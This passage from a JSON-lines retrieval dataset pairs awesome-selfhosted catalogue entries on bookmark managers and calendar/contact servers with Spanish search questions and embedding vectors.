-0.13448, 0.00765, 0.0222, -0.02374, -0.16957, 0.0217, 0.0483, -0.04687, -0.03651, -0.00424, -0.01461, -0.05621, 0.02086, -0.07696, -0.03801, -0.10349, 0.00818, 0.0299, 0.03549, -0.08001, -0.0176, -0.0177, 0.01255, -0.00234, -0.06309, -0.01623, -0.04314, 0.01054, -0.01488, 0.05005, -0.0198, 0.03217, -0.0245, 0.06236, -0.02074, 0.04635, -0.08504, -0.06414, -0.09828, 0.03501, -0.02223, -0.03198, -0.02161, -0.03473, 0.02516, 0.02178, -0.08092, 0.00276, -0.00944, 0.00472, 0.05048, -0.03215, -0.01469, 0.02312, -0.00186, 0.03193, -0.03592, 0.00302, -0.06938, 0.05059, 0.01056, -0.02507, -0.05626, 0.00683, -0.03627, -0.00997, 0.00952, -0.06817, -0.00283, 0.01063, 0.06541, 0.08913, 0.01654, 0.03347, -0.02799, -0.03219, -0.02063, 0.05414, -0.01084, 0.00233, -2e-05, 0.00441, 0.0589, 0.08646, -0.0349, 0.03629, -0.01078, 0.00065, 0.00285, 0.03769, 0.01251, 0.01228, -0.03382, -0.0026, -0.06338, 0.07014, -0.03798, 0.02393, 0.03418, -0.00933, 0.01981, 0.01193, 0.01938, 0.01245, -0.03643, -0.01303, -0.04098, -0.03401, 0.03634, -0.00256, -0.10619, -0.04452, -0.00061, 0.05275, -0.03627, 0.0044, -0.03443]} -{"tipo": "pregunta", "herramienta": "Bookmarks and Link Sharing", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Bookmarks and Link Sharing", "tema": "bookmarks and link sharing", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Bookmarks and Link Sharing: linkding β€” Minimal bookmark management with a fast and clean UI. Simple installation through Docker and can run on your Raspberry Pi [MIT, Docker]. LinkWarden β€” Bookmark and archive manager to store your useful links [MIT, Docker/Nodejs]. NeonLink β€” Bookmark service with unique design and simple installation with Docker [MIT, Docker]. Readeck β€” Save the precious readable content of web pages you like and want to keep forever. See it as a bookmark manager and a read later tool [AGPL-3.0, Go/Docker]. Servas β€” A self-hosted bookmark management tool. It allows organization with tags, groups, and a list specifically for later access. It supports multiple users with 2FA. Companion browser extensions are available for Firefox and Chrome [GPL-3.0, Docker/Nodejs/PHP]. Shaarli β€” Personal, minimalist, super-fast, no-database bookmarking and link sharing platform [Zlib, PHP/deb]. Shiori β€” Simple bookmark manager built with Go [MIT, Go/Docker]. Slash β€” An open source, self-hosted bookmarks and link sharing platform [GPL-3.0, Docker].", "indexar": "con quΓ© programa puedo guardar mis enlaces favoritos de forma sencilla y sin base de datos?", "v": [0.02304, 0.16479, -0.13118, -0.11881, 0.01055, -0.06619, 0.01575, -0.11417, -0.14778, -0.13276, 0.01066, -0.13356, -0.0788, -0.10529, 0.06799, 0.09318, 0.16044, -0.11421, -0.00995, 0.01723, 0.02146, -0.07904, -0.03253, -0.10718, -0.13376, -0.05015, 0.12683, 0.05401, -0.11206, 0.07881, -0.03562, -0.01459, -0.0178, -0.0258, -0.02457, 0.08407, 0.08967, 0.06165, -0.00799, -0.11396, -0.07308, -0.02007, -0.03165, 0.08922, -0.07323, 0.00664, 0.00905, 0.01615, 0.06114, -0.11487, 0.00073, -0.01591, -0.08572, -0.05134, -0.06038, -0.16422, 0.06712, -0.05908, 0.043, 0.09284, -0.05256, 0.10312, 0.05123, 0.05195, 0.03184, -0.03258, 0.04756, -0.01187, -0.08024, 0.03846, -0.00797, 0.07187, -0.02357, -0.04527, -0.00248, 0.06344, 0.06766, 0.01742, 0.01289, 0.05985, -0.1197, 0.01821, 0.04234, 0.00215, -0.03527, -0.01454, 0.04525, 0.00496, -0.09944, -0.09688, 0.09648, 0.0669, -0.03884, 0.09377, -0.00049, -0.03893, 0.02575, 0.07722, 0.00677, 0.02587, 0.05279, 0.04423, -0.03271, 0.16655, 0.0547, 0.05898, 0.09968, -0.00884, -0.0635, 0.02903, 0.01215, -0.02468, -0.10093, -0.0783, -0.05115, -0.00998, -0.05586, 0.01644, -0.02024, -0.08468, -0.03912, -0.04946, -0.05615, 0.04503, 0.04898, -0.02679, 0.01198, 0.12794, -0.05863, 0.08855, -0.01357, 0.06389, -0.07941, -0.02435, 0.07266, -0.0198, -0.06458, -0.01638, 0.0623, -0.11589, 0.04134, 0.05909, -0.03386, 0.00422, 0.04625, -0.05489, 0.05544, 0.01067, -0.09274, -0.06975, -0.00668, 0.03469, 0.00138, 0.02955, -0.08048, -0.0049, 0.01306, -0.09575, -0.00833, 0.02151, -0.00996, 0.06642, -0.05069, -0.0178, 0.04647, -0.05355, 0.05443, 0.01477, 0.04705, 0.05401, -0.0376, 0.10921, -0.00055, -0.12751, 0.00971, -0.10561, -0.07251, -0.08006, 0.01904, -0.01616, -0.0711, 0.00484, 0.01162, 0.09279, -0.03005, -0.08788, 0.02496, 0.0126, 0.02258, -0.02662, -0.00579, 0.05028, 0.01254, 0.00447, 0.05491, -0.04434, -0.02101, 0.02602, 0.07041, 0.01078, -0.07833, -0.06403, 0.02791, 0.05072, 0.02262, 0.07092, -0.08673, -0.05759, 0.00427, 0.04994, 0.01376, -0.07864, 0.09324, -0.03955, -0.03484, -0.04367, 0.03595, 0.03746, 0.04603, 0.02297, -0.02287, 0.02902, 0.06696, -0.00127, -0.03798, -0.05851, 0.0213, 0.03717, 0.03779, -0.00067, -0.03827, -0.06783, 0.00165, -0.04243, 0.03717, -0.01245, -0.07978, -0.03432, -0.03224, -0.0251, 0.02656, 0.10324, -0.01655, -0.08124, -0.00177, 0.0285, -0.0906, 0.07077, 0.0103, -0.08777, 0.00106, -0.01065, 0.01849, -0.08878, -0.00258, -0.03487]} -{"tipo": "pregunta", "herramienta": "Bookmarks and Link Sharing", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Bookmarks and Link Sharing", "tema": "bookmarks and link sharing", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Bookmarks and Link Sharing: linkding β€” Minimal bookmark management with a fast and clean UI. Simple installation through Docker and can run on your Raspberry Pi [MIT, Docker]. LinkWarden β€” Bookmark and archive manager to store your useful links [MIT, Docker/Nodejs]. NeonLink β€” Bookmark service with unique design and simple installation with Docker [MIT, Docker]. Readeck β€” Save the precious readable content of web pages you like and want to keep forever. See it as a bookmark manager and a read later tool [AGPL-3.0, Go/Docker]. Servas β€” A self-hosted bookmark management tool. It allows organization with tags, groups, and a list specifically for later access. It supports multiple users with 2FA. Companion browser extensions are available for Firefox and Chrome [GPL-3.0, Docker/Nodejs/PHP]. Shaarli β€” Personal, minimalist, super-fast, no-database bookmarking and link sharing platform [Zlib, PHP/deb]. Shiori β€” Simple bookmark manager built with Go [MIT, Go/Docker]. Slash β€” An open source, self-hosted bookmarks and link sharing platform [GPL-3.0, Docker].", "indexar": "quΓ© alternativa libre a los marcadores me sirve para tener acceso rΓ‘pido al contenido que quiero leer mΓ‘s tarde?", "v": [-0.11774, 0.17443, -0.25003, -0.05586, -0.07899, 0.03487, -0.07459, 0.00306, -0.10014, -0.14429, -0.0198, -0.17586, 0.03513, -0.10528, 0.18438, 0.01133, 0.1029, -0.01092, 0.16294, -0.01828, 0.07412, -0.05986, -0.20656, -0.12955, -0.0684, -0.09674, 0.07662, 0.02497, -0.12359, 0.06162, -0.06059, 0.04124, 0.0788, 0.03033, -0.04537, -0.02397, 0.12704, 0.07465, -0.02274, 0.02266, 0.08174, -0.01986, -0.09054, -0.01546, 0.01794, -0.02437, -0.02461, 0.11168, -0.0288, 0.08132, 0.03069, -0.04181, -0.00396, 0.01007, -0.07688, 0.10717, 0.13484, -0.02837, -0.04706, -0.08115, -0.03108, 0.0304, 0.01552, -0.08934, 0.0625, 0.00187, 0.00946, 0.09162, -0.0374, 0.09174, -0.03995, -0.06814, 0.09735, -0.08834, -0.06933, 0.11853, -0.09288, 0.02844, -0.02617, 0.12515, 0.0535, -0.0769, -0.03358, -0.03034, 0.02349, -0.00539, 0.02523, -0.12038, -0.00122, -0.05338, 0.13627, 0.11102, -0.00018, 0.01582, -0.06749, -0.06272, -0.01526, 0.00447, -0.00268, 0.08674, 0.06534, 0.0296, -0.07179, 0.00315, 0.04399, -0.05934, -0.04697, -0.01998, -0.02619, 0.00911, 0.03277, 0.04727, -0.04732, -0.06947, 0.055, 0.02022, -0.04196, 0.0033, -0.06, -0.02851, -0.04503, -0.01455, 0.01087, -0.06974, 0.06332, -0.00525, 0.08149, -0.05646, -0.02152, 0.02, 0.03159, -0.0489, -0.03763, -0.07831, -0.12417, -0.03208, 0.00386, -0.0455, -0.02011, 0.01557, 0.00834, -0.03229, -0.04167, -0.04494, -0.03202, -0.09372, 0.09845, -0.08024, -0.02211, 0.00439, -0.1184, -0.11107, 0.00346, 0.03274, -0.05058, -0.01445, 0.0218, -0.05438, -0.06133, 0.08204, -0.04151, 0.0491, -0.04308, 0.04953, -0.0405, -0.06819, -0.00391, -0.04256, 0.00087, 0.0395, -0.01991, 0.03373, 0.03821, -0.14385, 0.09797, -0.07488, -0.01061, -0.03844, -0.00102, -0.03556, 0.00736, -0.03564, -0.05198, 0.02623, -0.03066, -0.03786, -0.03445, 0.01369, -0.02203, 0.01331, -0.01571, 0.02382, 0.02503, -0.05205, 0.00545, -0.0204, -0.01744, -0.04726, 0.01389, 0.01673, -0.0118, -0.08478, 0.0179, -0.00789, 0.02397, 0.0079, -0.02204, 0.06809, 0.02204, 0.04303, 0.02289, 0.03399, 0.08661, -0.00662, -0.0224, 0.03597, 0.01238, 0.04709, 0.00497, 0.00087, 0.07932, 0.03437, 0.00426, 0.00047, 0.04678, 0.02098, -0.00184, 0.00382, 0.01252, 0.05469, 0.01882, -0.01215, -0.05374, 0.03233, 0.02257, -0.0614, -0.07784, 0.00883, -0.02447, 0.00757, 0.02142, 0.03013, -0.00561, -0.01978, -0.03927, 0.01033, -0.08786, -0.0114, -0.05377, -0.06505, -0.04745, 0.00173, 0.01473, -0.00474, 0.01653, 0.01354]} -{"tipo": "pregunta", "herramienta": "Bookmarks and Link Sharing", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Bookmarks and Link Sharing", "tema": "bookmarks and link sharing", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Bookmarks and Link Sharing: linkding β€” Minimal bookmark management with a fast and clean UI. Simple installation through Docker and can run on your Raspberry Pi [MIT, Docker]. LinkWarden β€” Bookmark and archive manager to store your useful links [MIT, Docker/Nodejs]. NeonLink β€” Bookmark service with unique design and simple installation with Docker [MIT, Docker]. Readeck β€” Save the precious readable content of web pages you like and want to keep forever. See it as a bookmark manager and a read later tool [AGPL-3.0, Go/Docker]. Servas β€” A self-hosted bookmark management tool. It allows organization with tags, groups, and a list specifically for later access. It supports multiple users with 2FA. Companion browser extensions are available for Firefox and Chrome [GPL-3.0, Docker/Nodejs/PHP]. Shaarli β€” Personal, minimalist, super-fast, no-database bookmarking and link sharing platform [Zlib, PHP/deb]. Shiori β€” Simple bookmark manager built with Go [MIT, Go/Docker]. Slash β€” An open source, self-hosted bookmarks and link sharing platform [GPL-3.0, Docker].", "indexar": "con quΓ© herramienta puedo organizar mi lista de enlaces personales usando etiquetas y grupos?", "v": [0.04098, 0.19944, -0.14796, -0.19948, 0.03212, -0.12763, -0.05957, -0.02223, -0.13659, -0.17335, -0.08462, -0.05235, -0.0179, -0.06381, 0.10151, 0.01958, 0.16181, -0.12391, 0.01609, -0.05508, -0.11057, 0.04266, -0.17579, 0.01412, -0.10779, -0.1166, 0.11876, 0.02788, -0.10269, 0.09115, -0.05212, 0.0498, -0.0322, -0.11613, -0.07021, 0.02133, 0.08933, 0.04227, -0.00811, -0.06168, -0.14921, 0.05761, -0.19075, 0.02575, -0.00574, 0.02666, -0.0814, 0.05143, -0.01221, -0.00025, -0.06008, -0.0828, -0.1432, -0.00733, -0.07049, -0.18789, 0.09706, -0.07342, 0.04514, 0.02692, -0.0845, -0.00315, 0.01236, 0.11397, 0.04012, 0.06067, 0.02366, -0.03609, -0.07671, 0.04983, -0.05214, -0.04883, 0.03242, -0.01279, 0.06508, 0.10439, 0.12911, 0.09776, 0.01728, 0.1114, 0.01129, -0.01371, -0.00609, 0.04312, -0.00862, -0.04929, 0.01573, 0.02505, -0.00024, -0.1143, 0.05663, 0.04449, -0.0492, -0.04117, 0.005, -0.01394, 0.02961, 0.09536, 0.08231, -0.00514, 0.10807, -0.01901, -0.04408, 0.12718, -0.0104, 0.00326, -0.00067, -0.0172, 0.01153, -0.02951, 0.01451, 0.01493, -0.01536, -0.00336, 0.04253, 0.01173, 0.0101, -0.02671, -0.00389, -0.0764, 0.00544, 0.0194, -0.09841, 0.00916, 0.03329, -0.00391, 0.06367, 0.13958, -0.04369, -0.03453, -0.03505, 0.02428, -0.07916, -0.04085, -0.03373, -0.04542, -0.05903, -0.07219, 0.07121, -0.04376, -0.0038, 0.03838, -0.06378, -0.10454, 0.01489, -0.01859, 0.00505, -0.02017, -0.05622, 0.03964, 0.03877, -0.01081, -0.02448, 0.0252, 0.00474, -0.00973, -0.06936, -0.05238, 0.01181, -0.01515, -0.0467, -0.00715, 0.02196, 0.01499, 0.022, 0.04562, 0.10508, 0.02449, 0.02612, 0.09281, 0.02742, 0.03895, 0.03724, -0.03642, 0.03029, -0.09992, -0.03287, 0.00832, 0.03003, 0.00236, 0.00213, 0.01306, -0.0292, -0.00399, 0.03818, -0.05796, 0.04452, -0.00557, 0.06804, 0.04715, -0.04881, 0.02434, 0.01974, -0.01812, 0.04357, 0.0161, -0.01236, -0.04153, -0.00962, -0.03835, 0.00212, -0.06685, 0.00411, 0.00807, 0.01127, 0.02452, -0.07286, 0.00221, 0.05475, 0.06068, 0.08323, -0.01432, 0.04869, -0.04504, -0.09507, 0.01661, -0.00211, -0.00597, 0.02751, 0.04621, 0.02516, 0.06995, 0.05843, -0.03082, 0.02396, 0.03526, -0.01245, -0.01109, 0.01453, 0.0345, 0.00557, -0.02797, -0.03055, -0.05432, 0.024, -0.05263, 0.01007, -0.02605, -0.05104, 0.02938, 0.02231, 0.06048, -0.00994, -0.04022, -0.06982, -0.05661, -0.02983, 0.0001, -0.03516, -0.10596, -0.02258, 0.02048, 0.05742, -0.04152, 0.04423, -0.02069]} -{"tipo": "pregunta", "herramienta": "Bookmarks and Link Sharing", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Bookmarks and Link Sharing", "tema": "bookmarks and link sharing", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Bookmarks and Link Sharing: SyncMarks β€” Sync and manage your browser bookmarks from Edge, Firefox and Chromium [AGPL-3.0, PHP].", "indexar": "que programa sirve para sincronizar mis marcadores entre diferentes navegadores de forma gratuita?", "v": [0.10958, -0.02301, -0.15221, -0.1253, 0.01399, -0.03524, 0.03816, -0.08584, -0.07944, -0.17357, 0.10085, -0.03384, 0.06505, -0.15177, 0.09206, 0.12523, 0.10669, -0.05795, 0.04991, 0.09122, 0.05805, -0.09682, 0.05239, -0.09452, -0.12076, -0.04699, -0.08027, -0.08307, -0.10061, 0.07772, -0.06899, -0.01456, 0.107, -0.06733, -0.02499, -0.06022, 0.09415, -0.0593, -0.03217, 0.07203, 0.01474, 0.0064, -0.07516, -0.01381, -0.1, 0.02192, -0.00751, 0.02674, 0.00163, -0.01003, 0.079, -0.00894, -0.09971, 0.08842, -0.06833, -0.09194, 0.09732, -0.1051, -0.02453, 0.0035, 0.07848, 0.04672, 0.03431, -0.0358, 0.09447, -0.09004, 0.03469, -0.02541, -0.02988, -0.01369, 0.06466, 0.0582, 0.06665, -0.06445, 0.00028, 0.19759, -0.07785, 0.00287, 0.08681, 0.07443, 0.0863, -0.00778, -0.02909, -0.00164, -0.1238, -0.03499, 0.01621, -0.01449, 0.04385, -0.09582, 0.10842, 0.17101, 0.01548, 0.10638, -0.01226, -0.09382, 0.11939, 0.0019, 0.07224, 0.11912, 0.05555, -0.03762, -0.07602, 0.09175, -0.0261, 0.05446, 0.07524, -0.07574, 0.00333, 0.02103, 0.03309, -0.02484, -0.04968, -0.07616, -0.01741, 0.04555, 0.00515, -0.03187, 0.05633, -0.11516, -0.11578, -0.00539, -0.11373, 0.00367, 0.06664, 0.05862, 0.02538, 0.04753, -0.00377, 0.09242, 0.04352, 0.01135, -0.07123, 0.0182, -0.11579, -0.0709, 0.00298, -0.07081, 0.02691, -0.03299, 0.08458, 0.04877, -0.01668, -0.00479, 0.04367, -0.02816, 0.06757, -0.08561, -0.10071, -0.05248, -0.00354, 0.00532, 0.00783, 0.03889, -0.05979, 0.00688, -0.00617, -0.00509, -0.05242, 0.07436, -0.0392, 0.01215, 0.04997, 0.02626, 0.01513, -0.06397, -0.05414, -0.03144, 0.10661, 0.06666, -0.03416, 0.06305, 0.04178, -0.09598, 0.00108, -0.01485, -0.03644, -0.01087, 0.05844, -0.07496, 0.00464, 0.02276, 0.02573, -0.01486, -0.10092, -0.08848, -0.0792, 0.02963, -0.01293, 0.01368, 0.00195, -0.02285, -0.03924, -0.00183, 0.0163, -0.0366, -0.00475, -0.03555, 0.01375, -0.02832, -0.0227, -0.05919, 0.02757, -0.00066, 0.01721, 0.07895, 0.00557, 0.05154, 0.07328, 0.12966, -0.00982, -0.04821, 0.05718, -0.03781, 0.00971, -0.02625, 0.03129, -0.00939, 0.05078, -0.01044, 0.00943, 0.00278, 0.03905, -0.00174, -0.01104, -0.01609, 0.06402, 0.01077, -0.02331, 0.01053, -0.00695, -0.00942, -0.01479, -0.01724, 0.0485, 0.00386, -0.01676, -0.01277, -0.01224, -0.06314, -0.04351, 0.07247, 0.0225, -0.05202, -0.03259, -0.08514, -0.06167, -0.05635, 0.0196, 0.00801, -0.0486, 0.09924, 0.04517, -0.02111, -0.00202, 0.03803]} -{"tipo": "pregunta", "herramienta": "Bookmarks and Link Sharing", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Bookmarks and Link Sharing", "tema": "bookmarks and link sharing", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Bookmarks and Link Sharing: SyncMarks β€” Sync and manage your browser bookmarks from Edge, Firefox and Chromium [AGPL-3.0, PHP].", "indexar": "cual es una alternativa libre a los gestores de enlaces que funcione con PHP y AGPL?", "v": [-0.00812, 0.03094, -0.07031, -0.14743, 0.05261, -0.0521, 0.11187, -0.18365, -0.21998, -0.11133, 0.02196, -0.00888, -0.09069, 0.02366, 0.20889, -0.08969, -0.04161, -0.20279, 0.04502, 0.0066, -0.1241, 0.05404, -0.08331, -0.1744, -0.07622, -0.05444, 0.12826, -0.06481, -0.09672, -0.09188, 0.05401, -0.03176, -0.01988, -0.05492, 0.04153, 0.05713, 0.07801, 0.12567, 0.12781, 0.00632, -0.04875, -0.0276, -0.15208, 0.06066, -0.06532, 0.00254, 0.01976, -0.08643, 0.06629, 0.035, -0.09472, 0.00698, -0.14635, 0.03124, -0.02683, 0.04955, 0.12091, -0.08731, 0.00796, 0.03067, -0.09012, -0.00535, 0.02741, -0.03322, 0.03369, 0.10016, 0.06975, -0.01409, -0.07161, 0.09295, -0.08905, 0.0668, -0.11799, 0.00764, -0.02377, 0.11866, 0.04845, 0.0139, -0.03624, 0.00799, 0.05652, -0.07911, 0.02927, 0.00695, -0.07307, -0.07475, 0.03069, -0.11409, -0.04946, -0.0263, 0.10561, 0.03216, 0.00613, 0.08016, -0.10766, -0.02798, 0.03262, 0.01516, 0.04372, -0.01775, 0.06556, 0.10421, -0.01136, 0.04244, 0.08349, 0.05979, 0.11525, 0.01603, 0.0257, 0.00067, 0.0477, -0.02845, 0.00329, -0.04826, -0.01246, 0.04058, -0.01825, 0.0007, -0.05559, -0.05831, -0.0754, -0.1188, -0.05331, 0.00816, 0.04805, 0.0619, 0.07452, 0.06666, -0.03976, 0.00367, 0.01312, -0.06131, -0.05183, -0.062, -0.06333, 0.06584, 0.06931, 0.08012, 0.00951, -0.02711, -0.0577, 0.01519, 0.05672, 0.02425, 0.05425, -0.07228, 0.04098, -0.01018, -0.04894, -0.00639, -0.02785, -0.02441, -0.02793, 0.04662, -0.11216, -0.03319, -0.01947, 0.02624, -0.05251, 0.11561, 0.03733, -0.01694, 0.05421, 0.05858, -0.03697, 0.00222, -0.03048, 0.00388, -0.01581, -0.01664, -0.03398, 0.09764, 0.04317, -0.06481, 0.05616, -0.06538, -0.06723, -0.08786, 0.08237, -0.02535, 0.0361, 0.00593, -0.03654, 0.05536, -0.03451, -0.03974, -0.00299, 0.0416, -0.01298, 0.00996, 0.05401, 0.01735, -0.05703, -0.02376, 0.02987, 0.01149, -0.00716, -0.05948, -0.01513, 0.02012, -0.05447, -0.06748, 0.06206, -0.01769, 0.02149, -0.00169, -0.00124, 0.0625, -0.0051, 0.04913, 0.03852, -0.01355, 0.09555, 0.02315, -0.02947, -0.01276, 0.00103, -0.00238, 0.02313, 0.00622, 0.00921, 0.00783, 0.04808, -0.03875, 0.01563, 0.00985, -0.00923, 0.04867, -0.04713, 0.02441, -0.02666, -0.0161, -0.0021, -0.04168, -0.01475, 0.03257, -0.01209, 0.02493, -0.05063, -0.02009, 0.0796, 0.08988, -0.029, -0.02311, 0.01065, -0.0385, -0.06773, -0.04111, 0.00445, -0.04016, -0.05, 0.00218, -0.01301, -0.02169, 0.00638, -0.00855]} -{"tipo": "pregunta", "herramienta": "Bookmarks and Link Sharing", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Bookmarks and Link Sharing", "tema": "bookmarks and link sharing", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Bookmarks and Link Sharing: SyncMarks β€” Sync and manage your browser bookmarks from Edge, Firefox and Chromium [AGPL-3.0, PHP].", "indexar": "con que puedo montar un servicio propio para compartir y organizar mis enlaces desde Edge, Firefox o Chromium?", "v": [-0.08187, 0.13971, -0.13231, -0.12259, -0.03645, -0.03427, -0.02522, 0.09093, -0.15389, -0.25823, -0.06526, -0.00151, -0.04183, -0.1995, 0.14548, -0.0357, 0.1579, -0.08501, -0.02686, 0.00677, -0.04316, 0.07095, -0.09595, -0.12357, 0.05453, -0.09196, 0.00391, -0.0524, -0.1111, -0.00792, 0.05604, 0.0806, 0.09558, 0.11626, 0.02066, -0.06502, 0.16044, 0.03763, -0.01941, -0.09097, -0.12515, 0.06664, -0.0931, 0.1071, -0.06262, -0.02124, -0.07123, -0.05702, 0.14904, 0.0629, 0.0107, -0.07585, -0.14747, 0.04132, -0.15028, 0.01534, 0.10856, -0.11644, -0.00489, -0.02253, 0.08294, 0.01161, -0.00079, 0.05178, 0.05289, -0.00265, -0.11172, 0.08921, -0.05491, 0.04393, -0.12746, -0.0961, -0.09986, -0.02443, -0.0615, 0.07301, 0.02255, 0.00698, 0.076, 0.08246, 0.06189, -0.04615, -0.04518, 0.06944, -0.1061, -0.01499, -0.03511, -0.01925, -0.01325, -0.02936, 0.08846, 0.1024, -0.03498, -0.01545, -0.05131, -0.08343, 0.05685, 0.01639, 0.11791, -0.01149, 0.03235, -0.00296, 0.05406, 0.14958, 0.00531, 0.00508, 0.09005, 0.02002, 0.07115, -0.01143, -0.03207, 0.02837, -0.01061, 0.03178, -0.06468, -0.05475, -0.01084, 0.00732, 0.05162, -0.01521, -0.06047, -0.01471, -0.01256, -0.00776, 0.01659, 0.03496, 0.05242, 0.07353, -0.04807, -0.00645, 0.02689, 0.01209, -0.04863, -0.0774, -0.05235, 0.064, -0.01908, -0.0663, 0.0346, -0.04859, 0.04741, -0.01035, -0.09669, -0.02413, 0.10054, -0.05806, -0.01642, -0.04651, -0.01347, -0.0358, -0.00192, 0.0445, -0.01441, -0.00853, -0.06917, -0.04064, -0.08457, -0.00793, 0.03583, 0.04626, 0.03548, -0.02597, 0.03095, 0.04129, -0.00147, 0.01734, 0.00815, 0.03488, 0.00514, -0.00496, -0.04948, 0.0784, -0.04707, -0.07151, 0.02597, -0.00216, -0.0281, -0.05145, 0.08791, 0.03544, 0.01416, -0.03281, -0.0173, 0.06041, -0.06039, -0.06443, -0.00639, 0.04137, -0.04893, -0.01179, 0.02676, -0.06788, -0.01552, 0.03092, 0.04868, -0.00722, -0.10175, -0.05785, 0.03118, -0.01187, -0.05408, -0.03809, 0.02675, 0.02462, -0.05386, -0.0519, 0.01223, 0.02938, 0.04196, 0.03283, 0.02857, -0.0206, 0.0362, -0.04145, -0.05596, 0.01898, 0.05493, -0.04659, -0.02309, 0.00029, -0.00083, 0.01839, -0.01292, -0.06625, 0.03555, -0.03269, -0.01109, 0.00668, 0.0097, 0.02032, -0.01436, -0.03987, -0.01775, -0.03056, 0.0468, -0.01421, 0.04362, -0.02817, -0.0193, -0.0204, 0.00169, 0.04451, 0.01519, -0.03628, -0.01605, -0.05322, -0.0181, 0.0353, 0.00267, -0.04867, -0.00836, -0.00723, 0.01766, -0.05166, -0.03753, 0.02783]} -{"tipo": "pregunta", "herramienta": "Calendar & Contacts", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Calendar & Contacts", "tema": "calendar & contacts", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Calendar & Contacts: BaΓ―kal β€” Lightweight CalDAV and CardDAV server based on sabre/dav [GPL-3.0, PHP]. DAViCal β€” Server for calendar sharing (CalDAV) that uses a PostgreSQL database as a data store [GPL-2.0, PHP/deb]. Davis β€” A simple, dockerizable and fully translatable admin interface for sabre/dav based on Symfony 5 and Bootstrap 4, largely inspired by BaΓ―kal [MIT, PHP]. Keeper.sh β€” Calendar syncing tool that pulls and pushes events between calendar sources and destinations via iCal/ICS or OAuth, with support for anonymized busy/free events [AGPL-3.0, Docker]. Manage My Damn Life β€” Manage my Damn Life (MMDL) is a self-hosted front end for managing your CalDAV tasks and calendars [GPL-3.0, Nodejs/Docker]. Radicale β€” Simple calendar and contact server with extremely low administrative overhead [GPL-3.0, Python/deb]. SabreDAV β€” Open source CardDAV, CalDAV, and WebDAV framework and server [MIT, PHP]. Xandikos β€” Open source CardDAV and CalDAV server with minimal administrative overhead, backed by a Git repository [GPL-3.0, Python/deb].", "indexar": "quΓ© servidor para calendarios y contactos ligero puedo usar en casa?", "v": [0.03259, 0.08737, -0.16996, -0.11104, -0.07725, -0.14707, 0.06205, -0.0261, -0.04981, -0.0885, -0.18234, -0.10642, 0.01259, -0.04905, 0.04525, 0.01509, 0.15103, -0.03905, 0.00833, -0.02565, -0.02347, 0.04546, -0.08611, 0.01122, -0.16683, -0.02128, 0.2018, -0.07966, -0.12378, 0.01122, -0.0138, -0.0405, 0.05372, 0.06644, 0.05524, 0.01521, -0.00278, 0.13615, -0.12917, -0.03956, 0.14562, 0.03196, -0.09767, -0.03282, -0.00125, -0.02105, 0.06338, -0.02353, -0.06077, -0.1002, -0.16961, -0.12399, -0.06155, 0.0057, -0.05162, -0.02212, 0.13469, -0.15004, 0.11663, 0.00717, -0.04325, 0.00156, 0.02649, 0.0495, 0.05386, -0.11096, -0.02432, -0.03176, -0.024, -0.11367, -0.10527, 0.02599, 0.03641, -0.03334, 0.02809, 0.02454, 0.06757, -0.03154, -0.03568, 0.03348, 0.00609, -0.02245, -0.01082, 0.11468, -0.07923, -0.0117, 0.06471, -0.00511, 0.03451, -0.09828, 0.06927, 0.08366, -0.078, 0.04844, 0.05256, -0.04437, 0.05692, -0.01666, -0.01058, -0.03199, 0.06412, 0.0169, -0.03277, 0.12211, -0.01364, 0.01622, 0.08357, 0.00222, 0.00619, -0.05429, 0.01339, -0.08028, -0.10946, -0.00862, -0.04965, 0.03629, 0.02713, -0.04045, 0.01165, -0.05167, -0.10147, 0.01343, 0.07428, 0.01175, 0.00818, -0.0344, 0.14004, 0.03179, -0.0302, 0.03398, -0.09332, -0.07691, -0.08268, -0.02638, 0.02335, 0.12049, -0.02079, -0.01202, -0.02103, -0.01091, 0.02559, 0.03211, -0.00978, -0.0591, 0.09886, 0.02254, 0.01519, -0.04768, -0.10448, 0.0106, 0.02433, -0.01298, -0.06713, 0.06841, -0.02675, -0.08651, 0.00105, -0.0284, -0.02249, 0.00294, -0.02743, 0.06149, -0.02623, 0.06813, 0.02469, 0.00788, 0.02386, -0.01391, -0.00877, 0.08, 0.00013, 0.05193, -0.01414, -0.07057, 0.01729, -0.05899, -0.0204, 0.00466, -0.07185, -0.01041, -0.02485, 0.07705, -0.06702, 0.00465, -0.0393, 0.00708, -0.03173, 0.05552, 0.013, 0.01077, -0.06647, 0.05462, 0.02282, 0.05722, 0.02755, -0.09123, -0.0081, -0.0375, -0.01327, -0.06654, -0.00259, -0.04231, 0.01824, 0.02956, 0.0603, 0.03615, -0.08333, 0.06168, 0.00337, 0.09847, -0.01249, -0.07313, 0.14517, 0.01244, -0.03947, 0.04111, 0.02999, -0.06136, 0.06322, 0.02096, 0.04216, 0.07954, -0.01503, -0.01543, 0.04359, 0.05681, 0.01404, -0.08664, 0.09194, 0.02102, -0.05676, -0.00222, 0.01223, -0.06776, 0.03561, -0.02411, 0.02476, -0.02376, -0.01791, -0.01249, -0.00926, 0.10305, 0.01634, 0.01135, -0.02332, -0.081, -0.01532, 0.02329, -0.03229, -0.04941, 0.01359, -0.02454, 0.06726, -0.01652, 0.00394, 0.03083]} -{"tipo": "pregunta", "herramienta": "Calendar & Contacts", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Calendar & Contacts", "tema": "calendar & contacts", "fuente": "awesome-selfhosted", "licencia": 